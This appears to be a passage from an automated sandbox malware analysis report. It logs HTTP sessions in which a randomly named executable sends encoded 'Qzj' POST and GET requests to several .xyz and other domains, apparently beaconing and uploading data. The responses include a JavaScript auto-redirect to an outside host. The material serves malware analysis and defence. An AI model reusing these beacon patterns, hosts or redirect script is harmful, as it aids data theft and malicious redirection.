                                                                                                                    Data Raw: 51 7a 6a 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 4b 30 2b 54 45 6c 61 4d 4a 76 32 4c 6c 4e 31 76 4d 4d 67 70 4a 4c 49 51 5a 5a 54 4b 52 49 39 4d 35 6a 63 77 79 4a 63 73 73 67 71 41 67 49 4f 46 44 6e 47 76 44 49 4e 32 62 4d 6c 6e 4b 61 4e 73 54 39 58 41 74 72 44 6e 70 47 70 35 47 50 57 2b 6c 51 68 37 35 65 69 56 63 6c 64 4f 6f 6f 50 33 4b 58 43 59 37 69 41 4c 42 2b 6a 45 59 6a 33 56 70 69 6a 51 57 7a 45 6e 75 6a 75 32 4f 72 36 39 37 53 58 68 4d 78 54 4f 37 33 52 39 34 46 78 4c 4c 76 51 4e 4b 72 56 35 4f 48 4c 41 78 6a 35 38 6d 7a 78 47 4a 35 79 78 37 73 51 37 31 4c 2f 48 45 63 32 62 77 4d 41 30 36 52 48 43 76 35 58 74 68 55 32 54 54 68 76 78 78 47 73 34 32 52 7a 48 69 63 6e 30 71 2f 32 62 39 6e 6f 36 4c 77 46 79 39 6e 44 63 57 30 4d 70 73 4f 57 31 65 4d 78 2b 4b 78 6c 79 78 4c 76 42 4b 77 59 6d 37 6b 5a 47 2b 41 67 4a 55 53 6b 48 62 44 59 47 69 71 4e 74 30 38 69 45 78 42 58 6e 33 44 67 70 47 4c 64 65 43 70 45 79 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1K0+TElaMJv2LlN1vMMgpJLIQZZTKRI9M5jcwyJcssgqAgIOFDnGvDIN2bMlnKaNsT9XAtrDnpGp5GPW+lQh75eiVcldOooP3KXCY7iALB+jEYj3VpijQWzEnuju2Or697SXhMxTO73R94FxLLvQNKrV5OHLAxj58mzxGJ5yx7sQ71L/HEc2bwMA06RHCv5XthU2TThvxxGs42RzHicn0q/2b9no6LwFy9nDcW0MpsOW1eMx+KxlyxLvBKwYm7kZG+AgJUSkHbDYGiqNt08iExBXn3DgpGLdeCpEyI0Xu5lt6jUR8+ZK4bZaMX5aHF0os22chCcvNjPqX890mktlUxg9aM+RfnCVVSkh3x11Ma8L7wcgurpfczxJZbPHlZdZjlna6lgqiZBqtzlkS7M15sL+PDhmwrG7wSGszemkSapnk0EQvI2BOgnx1kqnW7F/81Zir1RV8maK0CIcCOyyirbKT3vQjAoXSakLNxNtfaIjo4kkjK5Flf1WHAfSI2yWk53NtlIUWAudXv5AT38Xd1DepZAfz4YaMQYlmjqaipRlZCslAzfu0prp9kckziLLVehPl86p+YhRQKVLHDDNom8DYPxvN/56q9kaA6YONX8zSdxSffEdNP9myF4hB0c7lpwEANq1v8dFRFOYaiSUVZU1FWCxOhJwKkguhXTyrbQs307af5YSSbT6bae5Nrj9jRr/v2FBQXx60819k/p8LNH5AIgz4kN8IAKrs0gXgZyj4UC0dz6qiODJpU9tJqWSZtig5Tbbh+LRt/KOLOj6xLO5UHSzBEeSTsOhV3o43SMJNxz195cTsnCIZl6wrSk8FkXXaZw1ULHCvaF/RIPVI4WdzMSGlqkM++8EoSWOA/iIfCQHH7leN+SIh7i9h83Wd8nspdaEqA4wf4moGsCqaJEOxMpsnCYckOftkCZoo9zVIRHg2Uni+dWvIZniWLc7DYHTVoi [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.45001465.21.196.90805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:56.262965918 CEST532OUTGET /2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfepEWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:07:57.147090912 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 24 Oct 2024 03:07:57 GMT
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.450015107.148.177.200805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:03.102500916 CEST786OUTPOST /ynjl/ HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.60881.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.60881.xyz/ynjl/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 43 47 45 62 74 43 5a 71 55 30 53 4c 4d 66 43 2f 66 2b 6d 6c 70 6f 73 31 56 59 50 38 6b 50 34 76 6b 4b 34 54 67 77 31 50 4a 64 48 30 4c 30 41 57 72 57 72 69 31 7a 73 6d 30 49 59 59 43 56 59 64 39 63 32 37 4a 64 38 39 34 61 38 77 30 6e 62 58 6a 4c 65 4f 41 45 35 35 53 6b 47 76 70 72 62 43 59 65 38 4a 5a 2f 43 70 6d 51 54 6d 70 6e 50 2f 6e 7a 58 6d 57 76 64 37 7a 57 48 79 35 30 55 35 76 53 6d 34 66 55 54 6b 38 34 57 59 57 51 49 6b 4d 37 57 4c 6e 77 75 4d 4a 4e 74 4a 31 76 6f 50 77 30 61 44 2f 4e 65 35 6c 2f 46 46 4d 66 76 78 4d 72 61 2f 54 77 6f 54 30 36 62 36 51 51 4f 69 2b 51 3d 3d
                                                                                                                    Data Ascii: Qzj=CGEbtCZqU0SLMfC/f+mlpos1VYP8kP4vkK4Tgw1PJdH0L0AWrWri1zsm0IYYCVYd9c27Jd894a8w0nbXjLeOAE55SkGvprbCYe8JZ/CpmQTmpnP/nzXmWvd7zWHy50U5vSm4fUTk84WYWQIkM7WLnwuMJNtJ1voPw0aD/Ne5l/FFMfvxMra/TwoT06b6QQOi+Q==
                                                                                                                    Oct 24, 2024 05:08:03.629532099 CEST557INHTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.450016107.148.177.200805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:05.639368057 CEST806OUTPOST /ynjl/ HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.60881.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.60881.xyz/ynjl/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 43 47 45 62 74 43 5a 71 55 30 53 4c 4d 37 2b 2f 54 39 4f 6c 76 49 73 32 61 34 50 38 78 66 34 72 6b 4b 38 54 67 78 42 68 4a 72 2f 30 53 51 45 57 35 48 72 69 79 7a 73 6d 68 34 59 42 47 56 59 61 39 63 4c 45 4a 5a 38 39 34 62 59 77 30 6d 72 58 6a 36 65 4e 41 55 35 37 48 30 47 74 32 37 62 43 59 65 38 4a 5a 37 72 68 6d 51 4c 6d 70 55 58 2f 6d 58 37 70 4b 2f 64 34 6b 6d 48 79 75 6b 55 69 76 53 6d 61 66 57 32 4c 38 36 75 59 57 52 55 6b 4d 71 57 4d 77 41 76 46 57 64 73 43 78 4b 64 78 38 6c 37 7a 35 66 66 65 74 2f 4a 35 4a 5a 2b 72 64 61 37 6f 42 77 4d 67 70 39 53 4f 64 54 7a 72 6c 65 6b 75 63 65 77 42 68 59 67 4d 57 5a 62 53 35 53 4d 4d 4f 6c 77 3d
                                                                                                                    Data Ascii: Qzj=CGEbtCZqU0SLM7+/T9OlvIs2a4P8xf4rkK8TgxBhJr/0SQEW5Hriyzsmh4YBGVYa9cLEJZ894bYw0mrXj6eNAU57H0Gt27bCYe8JZ7rhmQLmpUX/mX7pK/d4kmHyukUivSmafW2L86uYWRUkMqWMwAvFWdsCxKdx8l7z5ffet/J5JZ+rda7oBwMgp9SOdTzrlekucewBhYgMWZbS5SMMOlw=
                                                                                                                    Oct 24, 2024 05:08:06.173131943 CEST557INHTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.450017107.148.177.200805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:08.192055941 CEST10888OUTPOST /ynjl/ HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.60881.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.60881.xyz/ynjl/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 43 47 45 62 74 43 5a 71 55 30 53 4c 4d 37 2b 2f 54 39 4f 6c 76 49 73 32 61 34 50 38 78 66 34 72 6b 4b 38 54 67 78 42 68 4a 6f 66 30 4f 7a 4d 57 72 31 44 69 7a 7a 73 6d 39 6f 59 63 47 56 5a 47 39 63 53 4e 4a 5a 34 48 34 5a 51 77 32 45 6a 58 79 5a 47 4e 54 30 35 37 46 30 47 75 70 72 62 62 59 66 4d 4e 5a 2f 33 68 6d 51 4c 6d 70 52 62 2f 79 7a 58 70 49 2f 64 37 7a 57 48 32 35 30 56 4e 76 53 2f 6e 66 57 79 68 2f 4b 4f 59 57 31 30 6b 4c 59 4f 4d 73 51 76 48 56 64 73 52 78 4b 5a 55 38 6c 32 4b 35 65 36 35 74 39 56 35 49 4e 58 51 5a 35 7a 4b 58 52 34 6a 74 73 6d 76 56 68 76 7a 6a 4a 30 4c 62 65 34 6a 6a 38 6b 6f 55 49 50 65 69 6e 5a 4c 55 41 70 56 78 4e 33 43 68 69 30 54 6f 4c 6a 4c 78 55 52 62 55 32 32 51 59 4f 4e 6c 36 4a 4c 4c 52 57 2b 68 31 46 47 76 6e 67 5a 4f 30 39 31 69 41 36 6e 73 6c 75 46 77 64 6a 65 47 31 31 75 6c 77 41 71 2f 37 57 30 6b 64 30 56 48 32 31 42 75 63 36 2f 66 6c 30 50 78 43 47 2b 44 58 56 4d 52 79 66 30 50 46 66 75 72 54 78 2b 34 55 59 65 4e 2b 4f 2b 35 4e 30 78 56 46 77 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=CGEbtCZqU0SLM7+/T9OlvIs2a4P8xf4rkK8TgxBhJof0OzMWr1Dizzsm9oYcGVZG9cSNJZ4H4ZQw2EjXyZGNT057F0GuprbbYfMNZ/3hmQLmpRb/yzXpI/d7zWH250VNvS/nfWyh/KOYW10kLYOMsQvHVdsRxKZU8l2K5e65t9V5INXQZ5zKXR4jtsmvVhvzjJ0Lbe4jj8koUIPeinZLUApVxN3Chi0ToLjLxURbU22QYONl6JLLRW+h1FGvngZO091iA6nsluFwdjeG11ulwAq/7W0kd0VH21Buc6/fl0PxCG+DXVMRyf0PFfurTx+4UYeN+O+5N0xVFwQHgjRyKKTA8QHS3pFSjFxJ63VEtVM5vUJmKuwYEWqoX8FyPR5rZFfvxJ/ZMwk1TsjBk+ePWWrsXsHXi8cf1TqYDD/usQgJ3kaZwZNFh+O+8OOoIqMtMFmg4c2xxBxCHWlyqQSz8P9GR/d/+S/wsRrHJV88XHFw6FU7fRFQ//FlCMdiuyXLZFs9+BAqm/KAyNP7/4w1YqN4xmvsf3cWMeQrraXdtXFrgRjTbQvthcB4EZeehMzTXpW5ys5RLXYN7EW369wHdU8Ui4Z9flGpkZKYRvTReTg/m+B2nb3HIRvEOE1AamKAgTCHIz8RWwn3l980CWB27AoaELHPxxZzctSDcEGC4JWwtDoUGdAAAOKviBrODivvvjLN8078mYLaYaQT73Zh6O4HRfjR6GipLNQDyif0SMm35fPPrR8EBxIpGqoZQrAqvmb44cy6wsiv1ffcZJ3r2sVA7ZtffCm93WoQXxkIbhYQIp2twlbv7ueG1+KJV4LbeQInwZlFXhBhMW5oNtV9WVXDZlwB14iIp2L/W00fOa/wooLBi+2lRV96yvLqlkPVx0d29JRy9zJn5XaDCRU1Ms9T+nZvMYmbB2V/N7aKiaY2ZrPsG8RGxN0WbboBKOneYQtJxsOJpUzJQpQFOrDxckVso9tnOoFuphUk/qbr7SIZHSkY [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:08:08.720948935 CEST557INHTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.450018107.148.177.200805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:10.731901884 CEST528OUTGET /ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.60881.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:08:11.263966084 CEST557INHTTP/1.0 200 OK
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=259200
                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                    Content-Length: 428
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.45001991.212.26.5805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:16.843899965 CEST807OUTPOST /r61b/ HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.mjcregionsud.org
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.mjcregionsud.org/r61b/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 2b 41 67 62 64 6a 78 4c 64 61 71 53 34 63 52 6e 6a 42 74 54 4d 45 49 56 64 5a 65 55 6f 71 56 74 59 42 67 37 6f 45 58 4d 4f 6f 59 35 75 65 32 45 52 68 6f 47 30 7a 75 6c 55 41 65 35 78 4c 4e 79 31 7a 6b 33 51 75 57 56 57 6f 52 4e 4c 72 38 57 76 77 63 76 65 33 4f 4b 41 76 70 39 34 4e 59 66 56 6f 75 70 45 39 33 6a 35 30 71 5a 4d 61 4f 45 4f 6f 39 58 6f 36 6a 33 64 4f 54 70 6e 6c 67 74 73 53 35 4f 31 5a 67 5a 6a 73 4c 7a 55 65 77 42 75 34 74 2f 7a 4f 73 65 42 41 5a 36 52 75 72 57 44 41 30 4f 55 4b 52 71 4b 71 76 41 52 4d 4f 54 33 2b 41 68 4b 77 3d 3d
